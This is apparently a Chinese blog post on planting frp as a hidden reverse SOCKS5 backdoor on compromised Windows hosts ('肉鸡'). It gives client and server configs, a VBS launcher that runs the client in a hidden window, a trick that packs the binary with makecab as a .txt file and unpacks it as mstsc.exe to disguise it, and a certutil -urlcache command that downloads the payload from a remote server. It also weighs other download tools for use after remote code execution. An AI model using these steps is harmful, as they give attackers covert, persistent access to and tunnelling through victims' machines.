之前在《科学养鸡指南》中提到过SS配合frp的反向socks代理组合,后来才发现frp本身就可以的,借此机会来回顾下frp远程肉鸡的上传与隐匿运行。
隐匿后门配置
#frpc.ini
[common]
server_addr = *.*.*.*
server_port = 7000
token = 123456
[socks_proxy]
type = tcp
remote_port =8888
plugin = socks5
#frps.ini
[common]
bind_addr =0.0.0.0
bind_port =7000
token = 123456
#frpc.bat
frpc.exe -c frpc.ini
#frpc.vbs
Set ws = CreateObject("Wscript.Shell")
ws.run "cmd /c frpc.bat",vbhide
压缩解压
减少文件体积,提高文件上传速度。
#压缩
makecab frpc.exe frpc.txt
压缩比例效果如下:
#解压
expand C:\Users\RabbitMask\Desktop\test\frpc.txt C:\Users\RabbitMask\Desktop\test\mstsc.exe
解压效果如下,与原文件完全一致:
远程下载
certutil -urlcache -split -f http://192.168.1.1/frpc.txt 1.txt
为什么不用bitsadmin?因为许多时候不适合交互式界面,尤其是RCE。
为什么不用wget?因为powershell版本太低的话不支持wget。
所以相对来讲certutil在cmdlet下算是最佳选择,如果目标支持powershell,Nishang、Invoke-WebRequest、powercat等等等等等任你选择,太多太多不做展开。
网友评论